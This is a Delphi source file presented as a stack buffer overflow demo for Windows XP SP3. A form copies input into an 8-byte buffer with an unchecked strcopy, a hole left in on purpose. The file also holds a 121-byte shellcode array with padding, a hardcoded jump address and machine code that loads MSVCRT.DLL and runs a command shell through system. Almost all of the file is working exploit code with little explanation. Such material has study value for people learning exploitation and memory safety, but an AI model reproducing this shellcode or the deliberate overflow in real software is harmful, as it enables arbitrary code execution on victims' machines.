[源码]Dephi溢出demo( Shellcode for XP)
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls;
type
TForm1 = class(TForm)
Edit1: TEdit;
Button1: TButton;
Button3: TButton;
procedure Button2Click(Sender: TObject);
procedure Button1Click(Sender: TObject);
procedure Button3Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
const
ShellCodeSize = $00000079; //16进制 - 121
//delphi overflow demo by k8team
ShellCode : Array[0..ShellCodeSize-1] of byte =
(
//AAAA BBBB CCCC
$41,$41,$41,$41,$42,$42,$42,$42,$43,$43,$43,$43, //115 73
$12,$45,$fa,$7f, // xp sp3 跳转地址
//CMD ShellCode
$55,$8B,$EC,$33,$C0,$50,$50,$50, //105 69
$C6,$45,$F4,$4D,$C6,$45,$F5,$53,
$C6,$45,$F6,$56,$C6,$45,$F7,$43,
$C6,$45,$F8,$52,$C6,$45,$F9,$54,
$C6,$45,$FA,$2E,$C6,$45,$FB,$44,
$C6,$45,$FC,$4C,$C6,$45,$FD,$4C,
$8D,$45,$F4,$50,$BA,$7B,$1D,$80,
$7C,$FF,$D2,$55,$8B,$EC,$83,$EC,
$2C,$B8,$63,$6F,$6D,$6D,$89,$45,
$F4,$B8,$61,$6E,$64,$2E,$89,$45,
$F8,$B8,$63,$6F,$6D,$22,$89,$45,
$FC,$33,$D2,$88,$55,$FF,$8D,$45,
$F4,$50,$B8,$C7,$93,$BF,$77,$FF,
$D0
);
implementation
{$R *.dfm}
procedure TForm1.Button1Click(Sender: TObject);
var k8test:pchar;
procedure k8overflow(k8test:pchar);
var test :array[0..7] of char;
begin
k8test:=pchar(edit1.text);
strcopy(test,k8test); //溢出
end;
begin
k8test:=pchar(edit1.text);
k8overflow(k8test);
application.MessageBox('没有溢出!','test');
end;
procedure TForm1.Button2Click(Sender: TObject);
begin
application.MessageBox('溢出了!','test');
end;
procedure TForm1.Button3Click(Sender: TObject);
var k8test:pchar;
procedure k8overflow(k8test:pchar);
var test :array[0..7] of char;
begin
k8test:=@ShellCode;
strcopy(test,k8test); //溢出
end;
begin
k8test:=pchar(edit1.text);
k8overflow(k8test);
application.MessageBox('没有溢出!','test');
end;
end.